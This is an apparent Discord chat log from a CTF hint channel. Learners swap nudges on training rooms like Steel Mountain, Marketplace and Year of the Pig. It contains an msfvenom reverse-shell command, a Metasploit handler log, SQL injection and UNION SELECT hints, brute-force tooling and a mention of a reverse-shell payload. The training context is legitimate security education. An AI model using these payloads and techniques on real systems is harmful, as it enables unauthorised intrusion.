#room-hints

Show screenshot of options.

What the payload currently

Sometimes you need to run it 2 3 times if it doesn't work

Set lhost to tun0.

You are not using vpn ip address.

He had to do 10.10 you did 10.0

Lol😂 happens

Nah, its default vbox ip which is eth0.

Oooo

it worked, but a shell didn't open, did i interpert this wrong cause now it says meterpreter instead of msf5

If it says meterpreter then you got shell.

ok cool

Type getuid.

Hey doing revenge now and i managed to drop the creds but couldnt get them to crack can anyone give a slight nudge?

I am stuck in task 2 question 6 of onepiece room. I got username but when i bruteforce using hydra for password. I got wrong password multiple time. Can anyone give me a small hint?

need a hint to solve crackme1 in Intro to x86-64 room

Anyone have a hint for revenge? Got flags 2 and 3, but I don’t understand how I skipped flag1. Lol

try enumerating the database again @thorny nest

when cracking a password i used hashcat right?

Use hashcat, john, crackstation or use whatever you like.

alright, thank you so much. im new to linux and ethical hacking and every bit of help is nice.

Muir pinned a message in #general. Check that out as well.

yea, im working on blue rn

ummm do you know where the hashcat directory is? im using kali linux

Don't use hashcat on a vm. If you to know where hashcat is type locate hashcat. Also, you can execute hashcat from terminal by typing it.

wait why not use on vm?

In vm you don't have access to gpu so it'll depend on cpu which is slower than using gpu.

alright that makes sense

what would be best for me to use then?

Hmm, use crackstation first if it can't crack it use hashcat or john whichever you prefer.

alright tyyy

Np.

Misguided Ghosts - omfg SUPER HARD!

@proven bridge can i dm ?(plz)

agreed, on it rn and I think I'm getting close to a foothold

😁

I’m glad y’all are hopefully struggling enjoying

definitely doing one of those @oblique cliff 🙂

@proven bridge can i dm ?(plz)
@cedar coral I can’t help for a few more days!

hey hi team i have pwned, Jeff machine and got USER.txt , but not working in the panel

You're told to do something

Do that thing

r u telling to me @stuck fractal

Who else?

No one else is here.

OH soory ,

i have got the user.txt

but not working in panel

Yes

so what can u do

You said that

And I told you something

i have checked for spacces

and all stuffs

You are told to do something to the flag

That you have not done.

yes to add the host

i ahve done taht already

No.

Something to the flag.

yeah i will try

sorry i cant get it

this told to ||hash||

in some algorithm

Keep trying.

At this point, you just need to keep going and you'll get it

done it

easy way , i have not thinks that

thanks @stuck fractal

There's no help or hints for 72 hours after the challenge releases.

try enumerating the database again @thorny nest
@median compass thanks! I got it now. Not sure why I missed that.

Anyhint dor Year of the Pig

Got some ||command|| but cant login

What are you stuck on @sick sun

Credentials for ||m|| and ||c||

What commands do you have?..

Only ||nc|| and ||id||

So you've already logged into the admin console?

@inland onyx Hmm no

Then how do you have nc and id?

@inland onyx Can i pm you ?

I am very confused rn, so yes

morning all! im trying to get the final flag on dogcat, ive extracted ||backup.tar|| and see a dockerfile. i assume i need to get into that docker environment but am having troubles, as docker is not in /bin. tried installing docker on the box since i have root, no suprise that it didnt work. could i get a small nudge? am i going in the right direction?

Top tip @rose cape
||You're already in the container||

oh poop thanks

That long, seemingly random host name is indicative of that -- as is the fact most of the commands are missing 😁

lmao i was about to comment on the choice for the hostname

Yep, randomly chosen at boot 😄

i honestly have no idea where to start on the Revenge room

ive checked through what I feel like is every crevice but I can't find any opportunities

hey ..

have any hint about - > { Year of the Pig } ?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

@inland onyx are hints being given out yet?

Yeah, it's been almost a week

Already

Holy cow

i dont got any idea about this machine i just got /admin .. and i make script brute force the admin panel .. without advantage

@supple bronze look at the hint after you try to use ||/admin||

so did you find usernames to test against and what did you use for your wordlist?

@supple bronze look at the hint after you try to use /admin
@near shoal i see but i dont sure about username ..

Case matters 😉

username is easy

Marcos ?

taylor ..

best hint I can give is don't overthink it

that what i got .

best hint I can give is don't overthink it
@near shoal ty btw 🌻

once you go from there you know what ||/admin|| tells you, you should be able to guess it or build a wordlist 😉

Hi... Any hint on "Year of the pig" ? i've been stuck since day 1 on the first flag.... i've done some /reading/research/scan/reverse(javascript)/bruteforce(json, cookie) and nothing ... i must be blind -_-. If i can mp someone and tell my story :p. any help would be really appreciate thx

@zinc dome where are you stuck? did you manage to log in?

i upgraded and i installed req but still cant

pip install requests or pip3 install requests

Run as python3 abc.py or python2 abc.py.

changes?

or not sir?

run it under python2, also try running python -m pip install requests

pip is aliased to pip3 for your system

@livid vault

And use screenshots please 🙂

okeokey sir

@zinc dome where are you stuck? did you manage to log in?
@sour vapor i'm stuck on login form...

so you lookig for a password right?

before a password, i must be sure of username

well username is kind of obvious, just go to the site

yeah if the username is author name

can i mp u ?

for "Year of the pig" admin login, do I need to find and build a small word list to crack it?

common word list is too slow considering the rule hint.

i am stuck in Task21

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

i am stuck in Task21

shiba2@nootnoot:~$ ./shiba2
cat: /etc/shiba/shiba3: Permission denied

You've broken the binary

Terminate and redeploy the machine.

• I am in room "Year of the pig".
• I stuck at admin login page, enumerating the password.
• I tried SQLi on username or (hashed) password, not work. I tried to enumerate the password using a wordlist, applying the rule given as hint after failed login, but common wordlists (50000+ entries) are too slow for this case.
  Can I get a hint?

i am stuck in Task21
@elder glade Please do not ignore the mentors if they ask for more information. It's a really good way to just be ignored in the help chats. It's also really disrespectful to them, given they're all volunteers giving up their time to help people

• I am in room "Year of the pig".
• I stuck at admin login page, enumerating the password.
• I tried SQLi on username or (hashed) password, not work. I tried to enumerate the password using a wordlist, applying the rule given as hint after failed login, but common wordlists (50000+ entries) are too slow for this case.
  Can I get a hint?
  @wicked rain Don't use a common wordlist

Hi, I'm new here. Stuck on the Learn Linux - Task 11. I've created what it asks for but unsure where to find the binary to run, it says simple challenge so perhaps I'm just overthinking it...

Did you SSH into the machine?

The binary is right there in your home directory, you can see it with ls

Ah - ok. I did but I exited it (to follow the directory listed on the pictures)

👍

Everything needs to be done in that machine

Thanks.

Terminate and redeploy the machine.
@stuck fractal Thanks a lot !! will do the same.

pls hint for misguidedghosts

i found 2 websites and enumerating them now im lost

Elf

72 hours from challenge release

oky 😦

@white salmon you can DM for smol hint if you want

@elder glade Please do not ignore the mentors if they ask for more information. It's a really good way to just be ignored in the help chats. It's also really disrespectful to them, given they're all volunteers giving up their time to help people
@inland onyx I am new to discord. I was trying to fetch the error details from the apps.

uwu, I think i need a hint on room "year of the pig' login

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

opps sorry.

1. Room of the pig. 2. Enumerating. 3. nmap, and looked at the source code for bizarre js code.

hey hi , can anyone help me in Blog machine , i have done it in metasploit , i need to do it in manual way

hi guys, sorry, I'm doing this room : ctfcollectionvol1 and i'm in task 12,
the hint says reddit, i read and look around but found nothing, any advice?

Please only ask in one channel

ok sotty

sorry*

is there someone doing the misguidedghosts room?

That's still a new room

Please wait 72 hours from release before asking for help

okay no problem didnt know😅

@sudden zephyr you can dm for a hint if you want

may i also dm for a little hinty @oblique cliff?

Ofc you may dm for a hinty

@oblique cliff may I get one wittle hinty too? 😄

only if you call it a wittle hinty

Good now? xD @oblique cliff

oh that was a joke i didnt check lol

yea ofc its ok haha

@thorny atlas

spent a while trying to figure out why a sha512crypt password wasnt getting loaded into a file doing echo $6$... > pw.txt

stupid dollar signs

Single quotes, or a text editor

nah when i echoed out the $, shell thought i was doing env variables from what I can tell

oh i see what yo uare saying

yea i ended up using an editor

nah when i echoed out the $, shell thought i was doing env variables from what I can tell
@flint lintel That's exactly what happens

it took me a while lol

yeah i figured out what you were saying right after I typed that 😄

I am looking for a nudge for The Marketplace (newly released) if anyone has already looked into it

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@lime verge As that's a brand new challenge room, please wait for 72 hours from room release.

Oh ok. Sorry for not reading more in depth the rules

@stuck fractal That was the key -f exe-service

Hello i need help downloading a tool called Printspoofer. The problem is i can not find the .exe file of it anyone thoughts?

TheMayor has a precompliled version hosted on his github https://github.com/dievus/printspoofer

Thx you very much, i got it 🙂

Are there any issues with some rooms? I cannot ping or see the Alfred room

Not all machines run webservers

Windows machines often don't respond to pings

Gotcha, I will ensure to run nmap with -Pn then

Anyone have a pointer for https://tryhackme.com/room/steelmountain ?
Task 3
Question 4: What is the root flag?
I've tried using the msfvenom reverse TCP shell and a few ports, I'm able to get the listener to receive some signal from the remote host; but never been able to pop a shell. I've tried both Powershell and normal Shell getting the same result
using: msfvenom -p windows/shell/reverse_tcp LHOST=SuperawesomeIP LPORT=4443 -e x86/shikata_ga_nai -f exe -o boopus.exe
I am also stopping said service prior to uploading said file

Make sure your listener has the exact same payload set

I'm not sure I understand, is there something that I have to specify with my listener?

The payload option

Ohhhh

I just got it

You need to set it to exactly the same thing as what you generated

I cannot overstate the importance.

I was trying to just use nc.

.>

w00t completed!

Thanks James!

hey hi , can anyone help me in Blog machine , i have done it in metasploit , i need to do it in manual way https://tryhackme.com/room/blog

Have you looked for an exploit?

You know what the vuln is so I'm sure you can find a script or instructions for it with research.

no i have logged in

but i have no ideas for getting shell

thanks got it , i am an idiot

Hello guys I'm on the Library room, and I'm a bit stuck 😦 someone have a hint for me plz ?

hi all, i'm patiently waiting for some hints on YoTP, way out of my league probably but....

i'm trying to brute force the password credentials using python

the md5 generated by my script matches the md5 generated by the website request

i've also set my user_agent details to match my chrome session

OMG NEVER MIND ! I found it !

i'm using a wordlist generated from words on the website, and then tacking on 2 numbers and every special character

case matters btw

you're on the right track and if you're using a wordlist derived off the site then you're going to hit the password eventually

i ran with title case, i'll rerun lower case....

kk, btw I preprocessed my passwords so to use them w/ faster brute forcers

this is probably a dumb question but I gotta make sure, you're stripping input right? python, when reading from a file via for loop will include the trailing newline character

i did it just with likely 'memorable' words typing into a list

will query the page and strip it into a proper word list now

was already stoked to see python cycling 500 requests at a time, was hoping it was an obvious 1-5 key words

i figured i might get lucky because already just 7 key words is 18000 combinations when you tack on the # & special chars

take 120 secs at 500 threads

7 key words, wait you mean 7 characters or 7 words?

Milan Piccolo Savoia

no, you're really close rn

still no luck grrrrr

does the T-120s imply it should take less than 120 seconds to run?

i'm happy to post my code if anyone would take a look

just don't want to put a spoiler

trying to find the message, but yeah T-120 means that it should take < 120s

any hints for tyler machine koth ??

Hi there,
I'm stucked in the room "Revenge". I used nmap /gobuster / dirsearch but nothing interesting (/login & admin found). Any tips ?

any hints for tyler machine koth ??
@white salmon 1. It still belongs in KOTH channel #koth

2. Check pins

ok

@sour vapor much obliged for the gentle hints without giving it away, off to debug why i can't write a proper Python script now 😄

🤦

my print success statement was nested in the function

it was working the entire time, but the success was hidden amongst the 21k returns

*to be a bit more accurate: concurrent.futures.ThreadPoolExecutor apparently doesn't catch exceptions in rookie code

so if you try to be a rockstar, make sure you don't make rookie mistakes in your code

hallo have only base question

@white salmon ok go ahead!

what is wrong on this pwhash::sha512_crypt

or this sha512_crypt

hey, need help on https://tryhackme.com/room/networkservices, Task 7, #10, someone know how to copy a reverse shell on a telnet session ?

Yes

You literally grab the msfvenom payload output

And paste it in, after .RUN

but i can't found the payload where it goes

Under payload size: 97 bytes

That thing that says mkfifo...... is the payload

ye but, as u can see in the screenshot, it get removed and i don't know why

What?

It doesn't get removed

That thing that says mkfifo...... is the payload

when i go into my /tmp/ i can't found the "elberg"

rm /tmp/elberg

maybe i misunderstand something

You are.

The payload there is the string of text.

It's a set of commands for a reverse shell. The text is your payload.

nvm i found thx so much

@rough totem that's a brand new room

Please wait 72 hours from release before asking for help or hints

I have deleted your message as it contained spoilers.

Guys I need a bit of a shove with Theseus's initial foothold. I could crack the cypher and have an idea about the key thing

Suit has asked that no one provides help or hints with it

Anyone tried The Market

?

@grim heron You're going to need to explain...

Think they want a hint on the new room The Marketplace

Yes @astral smelt

Please wait 72 hours from release before asking for help or hints

Okay

@rough totem that's a brand new room
@stuck fractal Ok, I apologize if i spoiled anyone

Can anyone help me with revenge?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Got the flag 🙂

Im on misguided ghosts still enumerating

um and i dont know how to say it without spoling it for someone but im at site that has console and requires pin so yes i tried many exploits but nothing lol

I'm on the Web Scanning room on Task 3 and I found #8 through research on google but i can't find the answer from ZAP

What's the question?

"Featured in various rooms on TryHackMe, Cross-Site Scripting is a vicious attack that is becoming ever more common on the open web. What Alert does ZAP produce to let us know that this site is vulnerable to XSS? Note, there are often a couple warnings produced for this, look for one more so directly related to the web client."

That alert is deprecated

So it won't show up

How would i get it to show up

You don't.

then how would i have found the answer

By waiting for the room to be updated.

and that's the right answer

oh great

Please don't post answers.

will do, so it's just the room that's old and not updated with the new update for ZAP

The alert was deprecated. You can read up on why.

@paper sapphire wrong path entirely

Ignore that page

Sorry for late response

any hints for The Marketplace room i understand the part of report page and after login page comes tried brute forcing and sql injection . any nudge in that direction

?

New Room, No hints for 72 hours :)

oh i have to wait

I don't have linux, so I installed nmap on my mac using homebrew. I am doing an nmap scan sudo nmap -sS <ip> Well it's just showing the ip's but not the ports. I am on the fourth room about nmap. Any hints or help please?

which room

https://tryhackme.com/room/rpnmap

this one^^

did you deploy the machine

yep

are you connected to the vpn

yes

try again please

now its showing 3

but the answer's 2

okay

but why is it like that?

Am I supposed to ignore something?

Sorry I am new

it's ports under a 1000

oh yes

thank you

Exploiting, can someone help me on how to get a shell using reflected XSS.

What room

Marketplace

no hints for new rooms until there 72 hours old

How do I do this?

When I did that room the other day I had to look up a writeup on it because the output never gave me the correct version. 😕

So is this room outdated?

wdym? I booted it up and I got the right answer

I am getting 7.2p2

weird, could you share the ip?

Right, that was the answer I was getting.

??

10.10.222.216

here's the command:

in case

I'm fairly certain that's the wrong machine, there's a flag at the port 80 yet there's no flag input anywhere to be found on the room's page

wdym?

There isn't supposed to be one, infact it's actually supposed to be DVWA running instead

Try rebooting the machine because I don't think this is the right one?

So do I re-deploy the instance

Yeah

jinx

I googled the flag to check what box was actually deployed and apparently it's from Linux Challenges

Now it shows the right machine, thx

np

@proven bridge dm? plz

Hi all, I am stuck at CSP challenge 6 ... any nudge 🤓 ?

man

ah u mean me 😮 ?

nope i mean I am confused..mine nmap is not working properly for THM< boxes

oh ok, why u think that ?

Colourful!

check thisone i can scan a specific port with nmap But i am not able to scann all ports at a time using nmap for THM box

yeah i was frustated...its several days now

am stuck here

You can't do -p- ?

yes

What happens

hey guy s , ihave stucked in || entering secret code , that is know 100% sure || in the https://tryhackme.com/room/lookingglass

Most probably it's taking some time

Try using -v

Also

Don't use -A and -sV

no resposne whe using -p- 1-65535

Just use -sV

-A will take forever

i tried that one too

not working

Personally I just do nmap -p- -T4 <ip>

Because then it just shows all open ports

then I do nmap -p[list_ports] -sV

I did this one too

What happens

am not able to scan all ports at a time using nmap

What happens

Can you screenshot?

Does it hang?

Does it crash?

Does it error?

no crash...its like no scan only showing scanning in progerss pls hold a sec i will send ss

no error

its taking longer and longer even no report getting

Have you tried in verbose mode with -v flag ?

It takes time

yes i did

maximu i waited for half an hour

i troubleshoot openvpn tooo

pls hold a sec i will send ss
Ok

Like this ....it will continue tilll i will not cancle the process

I don't see the -v flag

It shows you the progress and estimated time

okay a sec pls

but

I scanned a single port to check it works...

It’s just going slow. It’s going. You’re scanning 65000 things

It’s just going slow. It’s going. You’re scanning 65000 things
@oblique cliff yes but why it is too slow....its like i have to wait for whole day

Which box is that on

advent of cyber

day 8 task 13

hey guy s , ihave stucked in || entering secret code , that is know 100% sure || in the https://tryhackme.com/room/lookingglass

Did you deploy the correct machine? @lusty cipher

yes i did

@weary quarry my guy you already asked. I saw. No need to ask again. You do however need to be clearer with what you’re asking

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Try to terminate and redeploy? Or is this always happening for you?

i have no idea but this is going for few days...

like i am already trying from few days

!vpnscript

i did troubleshoooting as well

Can you head over to tech support and be detailed with the problem?

sure pls

It's just slow 🤷‍♂️ You can't help it

It takes over up to 3 hours sometimes for me. Try using something like threader3000 or rustscan

@final mortar help him plz I want to sleep

Go Bob,

hehey, I am stuck on a very simple last question in a lab. "How about the second common home private range?" Format is ... and the question before was 192.168.0.0 so the only possiblity I think would be 172.16.0.0 but it is false. Other private range would be 10.0.0.0 but that doesnt fit the given form 😮

Given format for the question is ---.---.-.-

10. Is Usually a corporate network

192 is home

yeah

It’s another 192 address range

yep!

Just figured it out, I thought they were asking for a different class of a network and not a subnet 🙂 thx

Hey guys I couldnt find the answer for https://tryhackme.com/room/tmuxremux
Task6/11

How can you run the desired plugin after loading it?
In my opinion it depends on the plugin

I don't want to give too much away but I googled "tmux run a shell command" and went through the first search result ;)

Try that otherwise DM me

Any help with CCT2019 task1 ? I got the packets, did the crypto, reversed the binary but no clue where to get the flag.

Hi @eager flicker If you have the bin, start analysing it, you will find how to continue if you analyse it

hi all, any hints for "Content Security Policy
" task #6 🤓 👀

Hi @eager flicker If you have the bin, start analysing it, you will find how to continue if you analyse it
@white salmon Figured that too but the room advices against re so I was thinking I'm doing something wrong.

@white salmon Figured that too but the room advices against re so I was thinking I'm doing something wrong.
@eager flicker ok got it after looking at the binary lol

Happy to hear that 😊

hi everyone! not sure if im on the right channel for this but anyways..im on https://tryhackme.com/room/rpmetasploit and when i run the exploit metasploit says the exploited is completed but no sessions was created what could be wrong?

Wrong settings most likely

show options and post a screenshot

1. You're using msf6 which is broken

2. You deselected the module or restarted MSF or something.

There should really be somewhat of a guide on installing msf5 from the source code. It was actually quite difficult to make it work

Why? Kali ships with it

Parrot doesn't, even though rapid7 asked them not to ship msf6

I installed a kali 2020.2 i think and it had msf6

Feel free to write a guide and post it in #resources

so it would be better for me to use Kali VM for THM?

Seeing as parrot shipped broken metasploit, yes.

2020 has msf6 also?

No

Because rapid7 asked them not to, and they listened

okok just asked because midwars said so

anyway thanks for the fast reply

ill try it that way

Probably it came with msf5 but I did have to upgrade some packages, might have updated msf as well in the process

Nope.

Kali didn't ship it, because it's broken

!dark

Hey guys, I'm a little stuck on https://tryhackme.com/room/linuxctf flag 16; I have no idea how to find the system device that it's stored on, let alone mount it (that is what I'm supposed to do, right?)

A system device is usually mounted to a specific location

I got it, thank you!

Google Dorking Question 1, I feel dumb but I cant seem to hit it on the head. 🙂 TYIA

In which section?

Task 2, question 1

Key term

Like is it in a paragraph ive overlooked ?

Probably

Got it

;)

gj

steel_mountain: I'm trying to overwrite the service file, but it is in use so I cannot overwrite it with my malware... Any tips (stopping the service stops my session)

Someone will help when they can

We aren’t ignoring you

We can see your messages

I just didn't know what is the correct channel for help... I wasn't impatient 🙂

Hmm, maybe changing the path is a good idea

That service shouldn’t have anything to do with your session

You should be able to stop it

Than it was coincidence... Try to change the path anyway 🙂

If you’re doing a path hijacking you’re not supposed to overwrite the file

the hint in the room told me to overwrite the service and restart it. (so no path hijjacking I suppose)

I stopped the AdvancedSystemCareService (Is there a spoileralert policy in this room?)

Yes there is

Use || on both sides to mark as spoiler

Euh... How to do this next time || test spoiler||

the hint in the room told me to overwrite the service and restart it. (so no path hijjacking I suppose)
@ember berry overwrite the service. Not the executable I believe?

ahh, nice

I don’t remember the task tbh you could be right

anyone can help with "The Marketplace" room ?

Please wait another... 22 hours?

why?

It is so everyone has a fair chance

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

ok no problem 🙂

Strange, The error with my connection crash was indeed a coincidence. But The service doesn't start. I've copied it, and now I try to start the service with Powershell, but I receive failure...

Can I use upload without specifying that it should be a binary upload?

(the msfconsole upload function)

You get a 1053?

what is that?

An error code

You said you receive failure, that's very vague

||ERROR: + start-service AdvancedSystemCareService9
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : OpenError: (System.ServiceProcess.ServiceController:ServiceController) [Start-Service],
ERROR: ServiceCommandException
ERROR: + FullyQualifiedErrorId : CouldNotStartService,Microsoft.PowerShell.Commands.StartServiceCommand
||

Try it with sc instead?

sc you mean secure copy?

No

It's a windows command

For services.

ahh, and it tells me 1053

🙂

Yep, so you can get around that by generating an exe-service format payload

I believe you can also get around it with staged payloads or something, but that's kind of hacky.

And that is something that should be uploaded tot the target, or is that my waiting reverse shell?

you know the -f argument for msfvenom?

That's for format.

-f exe-service

ah, oke, I'll create a new exe, But now... I'm far past bed time... Hoped to finish this one

Thanks a lot!

-f exe works fine. I've tested this over and over again at this point.

@weary quarry my guy you already asked. I saw. No need to ask again. You do however need to be clearer with what you’re asking
@oblique cliff --> i am clever that it should leak with any spoiler

Spoiler tags

Are this allow to ask hint room marketplace ?

Not yet. Hints/help are allowed after 72 hours.

I cant find the SQL injection point for marketplace 😦

Please wait another 11 hours

ill keep trying

Not yet. Hints/help are allowed after 72 hours.
@wintry yarrow okay

Can someone give me a hint for CSP room flag 6?

am tring to do marketplace but can't get what the hint wants me to do

can anyone help ?

!rule 13

I tried. You cannot ask questions about the room for 72 hours after release

I think in 10 or less hours you can ask 🙂

that's quite nice of a deadline

8PM UK time

out of room i need a advice

This is the room hints channel

should i go general ?

i mean #infosec-general ??

Most likely.

btw this site marketplace looks like a django site, can anyone confirm ?

No hints yet.

Please wait 5 hours

Good afternon. I have a little question, I'm at the beginner path, OWASP Juice Shop, doing the task 3, Inject the Juice; but somehow i've got Logged into the admnistrator account before, and now i'm trying to do the injection " ' or 1=1--" but how i've already done the challenge i can't get the flag. How to reset the page ScoreBoard. Or better how does it identifies me, since i've got connected from different IP through proxy and it still knows who am i.

that wasn't for hint just the url scheme looks like the same that's why i asked

Good afternon. I have a little question, I'm at the beginner path, OWASP Juice Shop, doing the task 3, Inject the Juice; but somehow i've got Logged into the admnistrator account before, and now i'm trying to do the injection " ' or 1=1--" but how i've already done the challenge i can't get the flag. How to reset the page ScoreBoard. Or better how does it identifies me, since i've got connected from different IP through proxy and it still knows who am i.
@white salmon
you can reset the machine and clear ur browser cookies

i've done it :/ even change OS, browser, all... but it still the same ScoreBoard. Don't understand it hahha

i've used VPN, Proxy, Tor, changed MAC, so far is at my noob hands for "anonimity" and reset the ScoreBoard, but no way ... somehow it still know who am i.

None of those will work seeing as you're accessing it over the THM VPN

It's not spoiler , I have completed the 0day room , but don't know if it was the intended way , if somebody has completed that room can we please discuss the way you tried

It's not spoiler , I have completed the 0day room , but don't know if it was the intended way , if somebody has completed that room can we please discuss the way you tried
@grim heron sure pm me

None of those will work seeing as you're accessing it over the THM VPN
@stuck fractal

tried without the VPN, only throught TOR browser and Macchanger, 0 cookies ... but it still recognizes me, don't know how... I bet i'm not prepared for that yet hahah

Literally won't help

You're not accessing it over the internet

You're accessing it over the THM VPN.

Anything to try and be anonymous on the internet won't touch it

No, im not in the THM virtual machine.... im accessing through my pc, throught on the PC 🤔 reinstalled ubuntu, and not even have my VPN Profile here, and reinstalled mozilla.

You're still accessing it over the THM VPN

How is that ? :/

Pretty damn sure it's a private IP address

10.10.x.x

soorry man for my noobness, but how do i check it? :/

I'm very interested how you're attempting to access a private IP address without using the VPN

soorry man for my noobness, but how do i check it? :/
@white salmon Check what?

Im not connected in the OWSAP room.. :/ and have any machine open there ...

im entering here https://juice-shop.herokuapp.com/#/score-board

Then how are you attempting to complete the tasks for the room?

Use the VM in the room.

Been stuck at this stage for like an hour now and cant get it to work

any hints what could be wrong

forgot to mention I am trying to get the last answer for vulnversity

That line looks duplicated

The one with enable now

wasn't that but I eventually did find out the problem xd, thx for making me double check

Then how are you attempting to complete the tasks for the room?
@stuck fractal Thanks mate. I was trying to direct Burp the OWASP page from my PC ... Now i did it from the THM VM and it worked. I got a clean juice shop. So, the other i acces is like a default one? Or how does it tracks my score if i changed all my config... it was supose to got me a new one , not? 🤔

One is a publically hosted one

The other is hosted on THM

ok, so the scoreboard is by default. Man it was running me crazy 😆 . thanks, will keep studying

still struggling with last touches of cct2019. can't figure out crypto1c and cant get plaintext out of last decrypt of for1. Any hints?

Hey, is it possible to get any help with The Marketplace already?

Not yet.

Not yet.
@wintry yarrow can you please how much time i can ask about it?

I thinks it was on the hour just passed now. Should be fine now

mod can confirm?

45 mins then you can ask 8 UK time

It is 8pm uk time

8.18

No it's 7:15

I live in uk

Oh wait it is i'm blind sorry

My discord time is wrong

@astral smelt dont be sorry best to make sure the rule isn't broken

great. so im at admin panel, trying ||SQLi on user param||. any hint?

I'm at the same bit

I spent too much time on it, could I have fallen into a rabbit hole?

There isnt much else to look at. Once you gain access you only have one extra page with what seem to be a very simple database.

i think about the ||JWT||, it has ||sqli|| attacks methods.

@random osprey yes you need to || do an sqli on the user param. You need to use union select for it. Search for the table names first and then see what you learn from them ||

My question for Marketplace task 2 (privesc to root) : || I've reached the first user shell. I saw what sudo command I can run and LinEnum came back with a Docker version. I've looked a lot at the sudo command and there is no way for me to write to the script file and/or change it, making me think I need to exploit the Docker, but I have no idea how since I have 0 experience with sandbox environments. Any nudges on how to do this? ||

@random osprey yes you need to || do an sqli on the user param. You need to use union select for it. Search for the table names first and then see what you learn from them ||
@lime verge normal URL decoding (ctrl+u) at burp is enough?

I did not even do it in Burp. Directly in the URL with the command

what about spaces?

ok

thnx

Okay, so I am on the marketplace. ||I found out the table name and the different fields for it, just need a hint towards how to display a value of one of those fields (password field) in the sql statement. I honestly don't know much sql so kinda stuck at this point||

Maybe || UNION SELECT password || actually not tried it yet still researching

How much of a big hint you guys want for the SQLi part? I have a nice link that explains it quite well what commands you can run in general

yes please.

A big hint would actually help at this point for me at least

im also stuck at the sqli part am trying to use the substring mysql function but doesnt seem to work am i on the right path?

|| https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/|| This helped me basically to do the hard part of it, finding the tables, then you can use the same principle for finding columns for certain tables and to get information out of it

Thanks.

Hey guys, I'm working on the Network Services room and I'm stuck on Task 4 Step 8.

I've never used SSH with a keyfile so I have a feeling I'm doing that part wrong.

Can you show us how you’re doing it?

I downloaded the id_rsa file from the remote host, ran chmod 600 on it, and put it in my .ssh directory.

no need to do the moving to .ssh

just check the ssh syntax 😉

it is ssh -"FLAG" key_file

If you move it to ~/.ssh then you don't need to use that flag

Even if I use -i I get the same thing

sure sure, but who want to mv all the time 😛

Connection closed by 10.10.249.161 port 22

whats the "message" ?

Generally that means wrong username

hmm

ssh -v -v -v user@box

(dont recall 3 or 4 v)

@stuck fractal You win. I'm a fool and made assumptions about the username.

Turns out that was wrong

I think it depends on the SSH configuration, because it doesn't always close the connection

Yeah that was odd. I expected a different error because if I tried root it asked for a password.

Thanks for the help

IIRC root has it's own settings for SSH in the config

Slightly different out of the box

That would make sense then

My question for Marketplace task 2 (privesc to root) : || I've reached the first user shell. I saw what sudo command I can run and LinEnum came back with a Docker version. I've looked a lot at the sudo command and there is no way for me to write to the script file and/or change it, making me think I need to exploit the Docker, but I have no idea how since I have 0 experience with sandbox environments. Any nudges on how to do this? ||
@lime verge well, || what can you do with that script without altering it, and what would that gain you || or did you finish this already?

I just finished the room btw

@near shoal yeah. Took a while to figure it out but it was a smooth ride from then. One of th best machines I've done on THM

it's pretty neat yeh

For every step I've learned something new

some classics in it for sure, even if they were more well developed than usual with some depth. Really enjoying Jammy's rooms. His CSP room was lit too

@lime verge did you ||cracked the bcrypt [Blowfish 32/64 X3] hashes?||

it's super slow

I think I'll jump in the CSP one next considering the quality

@random osprey dont bother cracking them

Hello, trying harder but no joy yet.. I'm in steel_mountain and trying to get the reverse shell. I see something connecting back, but it doesn't end in a shell.

sf5 > use multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

[] Started reverse TCP handler on 10.8.113.208:5555
[] Sending stage (176195 bytes) to 10.10.103.82

this with the msfvenom command in the room notes (shigata_ga_nai)

I'm working on jeff's webserver.. after a VERY long process, i've finally got a ssh credential to a machine relevant to the room title.. I see a file user.txt. I see a flag, that matches THM's flag structure (THM{flag}) ... (it wasn't easy, but i coaxed echo into helping) .. BUT this flag isn't working. Is there another step I am missing for the flag, or is it Likely i am I copying it wrong.. its a pretty lengthy flag

Aren't you told to do something to the flag?

https://tenor.com/view/leo-titanic-gif-4948607

hMMMM.

Noooooooo it didn’t embed

https://tenor.com/view/titanic-kate-winslet-leonardo-di-caprio-voglio-gif-8627264

The hint is not related to anything abotu the file, the hint points to a hosts

which was vital, for foothold, but that was so many steps ago

let me ponder this for a minute

